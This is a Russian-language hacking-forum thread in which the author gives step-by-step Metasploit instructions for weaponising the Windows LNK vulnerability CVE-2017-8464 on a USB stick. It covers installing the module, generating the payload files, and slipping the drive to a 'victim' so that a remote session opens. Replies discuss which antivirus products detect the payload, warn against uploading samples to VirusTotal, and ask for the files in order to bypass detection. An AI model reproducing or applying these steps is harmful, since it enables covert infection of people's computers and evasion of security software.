Toggle sidebar

/bad USB CVE_2017_8464\ _ # by Ondrik8

Ondrik8

Ondrik8

prodigy
Green Team
08.11.2016
1 113
3 154
Всем привет, смотрю пошла у нас движуха с USB девайсами для заражения жертв, ну думаю "че я лысый?) в трэнде нужно быть!" Правильно?_) Вот и представлю Вашему вниманию очередной способ заражения от меня)
Нам потребуется 5 минут USB - накопитель, Kali-linux и так едем... сюда !

Screenshot_11.png


уязвимые ОС-и

Screenshot_12.png


переименовываем и телепортируем в метасплойт:

Код: 
mv 42382 CVE_2017_8464_LNK_Rce.rb

Код: 
mv CVE_2017_8464_LNK_Rce.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

запускаем MSF и обновляемся командой: reload_all и...

Screenshot_14.png


exploit -j

далее, настраиваем под себя уязвимость:

Код: 
use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce


Screenshot_15.png


можете еще и порт настроить под себя, жмем: exploit

MSF сгенерит файлы, откроем скрытую папку где они лежат) командой: xdg-open /root/.msf4/local/

перенесем их в нашу злую USB-flash-ку )) и подсунем флэшку "жертве прогресса"!)) Как только "жертва" откроет у себя на компе для просмотра содержимого, у Вас появится заветная сессия!))

Удачи!
 
  • Нравится
Реакции: r0hack, valerian38, Vertigo и ещё 5
спасибо! а как реагируют антивирусники, не тестил? есет будет ругаться?
 
  • Нравится
Реакции: Ondrik8
Ondrik8 сказал(а):
не нетестил с антиками) если есть возможность? отпиши плиз..
Нажмите, чтобы раскрыть...
где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)
 
MrsRobot сказал(а):
где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)
Нажмите, чтобы раскрыть...
У Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)
 
  • Нравится
Реакции: s1rk0 и persivald
  • Нравится
Реакции: Vertigo и Ondrik8
IioS сказал(а):
360 total security - палит троян как только флешку втыкнула
Нажмите, чтобы раскрыть...
есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
Ondrik8 сказал(а):
У Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)
Нажмите, чтобы раскрыть...
ок..сама потестирую будет время
у нас все в облаках
 
MrsRobot сказал(а):
есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках
Нажмите, чтобы раскрыть...
www.antivirusware.com/
http://www.threatexpert.com
https://www.zonealarm.com
http://www.virscan.org
https://www.symantec.com
https://www.comodo.com
 
MrsRobot сказал(а):
есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках
Нажмите, чтобы раскрыть...
есет смарт секьюрити (лицензия) обнаруживает трояна
 
  • Нравится
Реакции: Vertigo и Ondrik8
кто может выложите плез файлы которые на флешку подкладываются нет под рукой метасплойта чеб сгенерить, покумекаю мож че как детект сбить.
 
При подключении флешки произойдет авторан эксплoитa?
 
Дедок сказал(а):
кто может выложите плез файлы которые на флешку подкладываются нет под рукой метасплойта чеб сгенерить, покумекаю мож че как детект сбить.
Нажмите, чтобы раскрыть...
Пагади... Там ж под каждый ип отдельны, могу помочь, дай только свой локальный ип(с той сети где будешь тестить)
 
IioS сказал(а):
Пагади... Там ж под каждый ип отдельны, могу помочь, дай только свой локальный ип(с той сети где будешь тестить)
Нажмите, чтобы раскрыть...
не мне нужно взглянуть на файлы что они из себя представляют для начала
 

Вложения

  • Снимок экрана от 2017-09-16 12-49-23.png
    Снимок экрана от 2017-09-16 12-49-23.png
    113,9 КБ · Просмотры: 285
  • Нравится
Реакции: Дедок
IioS сказал(а):
держи
Нажмите, чтобы раскрыть...
мне нужны именно ФАЙЛЫ которые на этой картинке ) не скрин ) понять в каком моменте детект идет какой кусок кода или на каком методе палево идет если моя мысль правильная когда я просматривал код экспа то есть идея как сбить, нужно тестнуть в обшем
 
Девушка.... что хотеть?)

Чето фильм вспомнился "девушка с тату дракона")
 
  • Нравится
Реакции: ghost и Дедок
  • Нравится
Реакции: Дедок и Ondrik8
Ondrik8 сказал(а):
Девушка.... что хотеть?)

Чето фильм вспомнился "девушка с тату дракона")
Нажмите, чтобы раскрыть...
Хороший фильм
Код: 
msf > -j
[-] Unknown command: -j.
msf >
msf > use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
[-] Failed to load module: exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
msf >
 
Последнее редактирование:
  • Нравится
Реакции: Vertigo, Ondrik8 и ghost
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab

Верх Низ
Назад